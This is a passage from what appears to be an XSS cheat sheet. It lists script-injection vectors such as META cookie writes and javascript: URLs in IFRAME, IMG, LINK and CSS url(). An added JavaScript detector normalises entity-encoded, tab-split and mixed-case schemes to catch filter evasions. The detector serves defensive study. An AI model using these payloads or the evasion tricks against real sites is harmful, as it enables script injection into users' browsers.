<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Writing a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href, url()

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
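Added example, not from the original post: every vector in item 14 relies on a URL-bearing attribute (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC) or a CSS url() whose value begins with the javascript: scheme, and blacklist filters that look for the literal string "javascript:" miss the same payload written in mixed case, with a tab or newline inside the scheme, or with the letters HTML-entity-encoded, because the browser decodes entities and strips tab/CR/LF before it parses the URL. The checker below normalises the value the way a browser does and then tests the scheme, so the obfuscated forms are caught alongside the plain ones. The attribute list, the entity table and all sample markup are assumptions constructed for this example. Note that current browsers no longer execute javascript: in IMG SRC or in CSS url(), while IFRAME/FRAME SRC and A HREF still do, so the checker treats all of them as unsafe rather than relying on browser behaviour.

```javascript
// Added example: scheme check for the javascript: URL vectors in item 14.
// Not code from the original post; attribute list, entity table and the
// SAMPLE_HTML below are constructed for this demonstration.

// Decode the character references a browser resolves inside an attribute
// value before URL parsing: &#106; &#x6A; &Tab; &NewLine; &colon; etc.
// (named entities are matched case-insensitively here on purpose: a
// detector should err towards flagging).
function decodeEntities(s) {
  const named = { tab: "\t", newline: "\n", colon: ":", lpar: "(", rpar: ")",
                  lt: "<", gt: ">", quot: '"', amp: "&" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === "#") {
      const code = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(code) ? String.fromCodePoint(code) : m;
    }
    return named[body.toLowerCase()] ?? m;
  });
}

// URL parsing removes every tab/LF/CR anywhere in the input and trims
// leading/trailing C0 controls and spaces; the scheme is case-insensitive.
function normalizeUrl(raw) {
  return decodeEntities(raw)
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "")
    .toLowerCase();
}

const SCRIPT_SCHEMES = ["javascript:", "vbscript:"];

// True when the value, after browser-style normalisation, carries a script scheme.
function isScriptUrl(raw) {
  const url = normalizeUrl(raw);
  return SCRIPT_SCHEMES.some((scheme) => url.startsWith(scheme));
}

// Attributes that take a URL in the vectors above (assumed list). Matches
// NAME="v", NAME='v' and bare NAME=v.
const URL_ATTRS = "src|href|dynsrc|lowsrc|background|action|formaction|poster|data";
const ATTR_RE = new RegExp(
  `\\b(${URL_ATTRS})\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "gi");
// CSS url(...) in style attributes or <style> blocks.
const CSS_URL_RE = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\s*\)/gi;

// Scan an HTML fragment and return every URL-bearing location with a script scheme.
function findScriptUrls(html) {
  const hits = [];
  for (const m of html.matchAll(ATTR_RE)) {
    const value = m[2] ?? m[3] ?? m[4];
    if (isScriptUrl(value)) hits.push({ attr: m[1].toLowerCase(), value });
  }
  for (const m of html.matchAll(CSS_URL_RE)) {
    const value = m[1] ?? m[2] ?? m[3];
    if (isScriptUrl(value)) hits.push({ attr: "css-url", value });
  }
  return hits;
}

// Constructed sample: payloads from item 14, three obfuscated variants a
// literal "javascript:" filter misses, and two benign URLs that must not be flagged.
const SAMPLE_HTML = `<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<a href="&#106;avascript:alert(1)">entity-encoded j</a>
<a href=" jav&Tab;ascript:alert(1)">tab inside scheme</a>
<a href="JaVaScRiPt:alert(1)">mixed case</a>
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<a href="https://example.com/?q=javascript:alert(1)">benign: scheme is https</a>
<img src="/img/logo.png">`;

for (const hit of findScriptUrls(SAMPLE_HTML)) {
  console.log(`${hit.attr}: ${JSON.stringify(hit.value)}`);
}
```

The check is deliberately a detector, not a sanitiser: on a hit, reject the value or replace it with a safe default, rather than stripping the scheme and keeping the rest, since a stripped "javascript:" can be reassembled by a second layer of encoding.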